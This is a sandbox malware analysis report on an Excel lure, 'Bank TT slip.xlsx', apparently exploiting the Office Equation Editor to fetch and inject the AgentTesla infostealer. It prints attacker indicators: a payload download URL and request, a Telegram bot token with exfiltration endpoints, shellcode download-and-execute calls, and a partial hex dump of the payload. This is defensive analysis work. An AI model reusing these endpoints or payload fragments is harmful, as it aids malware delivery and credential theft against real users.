Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name:Bank TT slip.xlsx
Analysis ID:626166
MD5:2391e6aa319cba9248661674ac5f2105
SHA1:bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256:18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1488 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2404 cmdline: "C:\Users\Public\vbc.exe" MD5: F18604D5FC3E2930E85C403E0E80A459)
      • RegSvcs.exe (PID: 1452 cmdline: {path} MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  5.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x30dcf:$s1: get_kbok
                  • 0x3172a:$s2: get_CHoo
                  • 0x3239d:$s3: set_passwordIsSet
                  • 0x30bd3:$s4: get_enableLog
                  • 0x35378:$s8: torbrowser
                  • 0x33d54:$s10: logins
                  • 0x33629:$s11: credential
                  • 0x2ffb6:$g1: get_Clipboard
                  • 0x2ffc4:$g2: get_Keyboard
                  • 0x2ffd1:$g3: get_Password
                  • 0x315d8:$g4: get_CtrlKeyDown
                  • 0x315e8:$g5: get_ShiftKeyDown
                  • 0x315f9:$g6: get_AltKeyDown
                  5.0.RegSvcs.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 30 entries

                    Sigma Signatures

                    Exploits

                    barindex
                    Sigma detected: EQNEDT32.EXE connecting to internet
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.27.27, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1488, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
                    Sigma detected: File Dropped By EQNEDT32EXE
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 5.0.RegSvcs.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
                    Source: vbc.exe.2404.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: Bank TT slip.xlsxMetadefender: Detection: 20%Perma Link
                    Source: Bank TT slip.xlsxReversingLabs: Detection: 31%
                    Antivirus detection for URL or domain
                    Source: http://172.245.27.27/SOA.exeAvira URL Cloud: Label: malware
                    Source: Http://172.245.27.27/SOA.exeKAvira URL Cloud: Label: malware
                    Source: http://172.245.27.27/SOA.exeXAvira URL Cloud: Label: malware
                    Source: http://172.245.27.27/SOA.exehhC:Avira URL Cloud: Label: malware
                    Source: Http://172.245.27.27/SOA.exejAvira URL Cloud: Label: malware
                    Source: http://172.245.27.27/SOA.exeBAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exeReversingLabs: Detection: 46%
                    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 46%
                    Machine Learning detection for dropped file
                    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exeJoe Sandbox ML: detected
                    Source: 5.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8

                    Exploits

                    barindex
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Office equation editor establishes network connection
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.27.27 Port: 80
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                    Software Vulnerabilities

                    barindex
                    Shellcode detected
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680658 ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036804ED ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680676 ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680641 ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: global trafficDNS query: name: api.telegram.org
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
                    Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewIP Address: 172.245.27.27 172.245.27.27
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:58:18 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28Last-Modified: Thu, 12 May 2022 04:27:00 GMTETag: "cb600-5dec8f8138359"Accept-Ranges: bytesContent-Length: 833024Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00 00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00 00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 80 08 00 dc 3f 04 00 03 00 00 00 86 03 00 06 e8 66 01 00 08 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 23 00 00 0a 2a 26 00 02 28 24 00 00 0a 00 2a ce 73 25 00 00 0a 80 01 00 00 04 73 26 00 00 0a 80 02 00 00 04 73 27 00 00 0a 80 03 00 00 04 73 28 00 00 0a 80 04 00 00 04 73 29 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 31 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 32 00 00 0a 00 2a 6a 02 02 7b 07 00 00 04 28 02 00 00 2b 7d 07 00 00 04 02 7b 07 00 00 04 2b 00 2a 6a 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 2b 00 2a 6a 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 2b 00 2a 6a 02 02 7b 0a 00 00 04 28 05 00 00 2b 7d 0a 00 00 04 02 7b 0a 00 00 04 2b 00 2a 6a 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 6a 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 6a 02 02 7b 0d 00 00 04 28 08 00 00 2b 7d 0d 00 00 04 02 7b 0d 00 00 04 2b 00 2a 6a 0
                    Source: global trafficHTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.27.27
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Http://172.245.27.27/SOA.exeK
                    Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Http://172.245.27.27/SOA.exej
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.27.27/SOA.exe
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.27.27/SOA.exeB
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.27.27/SOA.exeX
                    Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.27.27/SOA.exehhC:
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bLHfhV.com
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                    Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
                    Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.pngJump to behavior
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
                    Source: global trafficHTTP traffic detected: GET /SOA.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.27.27Connection: Keep-Alive

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Office equation editor drops PE file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    .NET source code contains very large array initializations
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.csLarge array initialization: .cctor: array initializer size 12054
                    Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
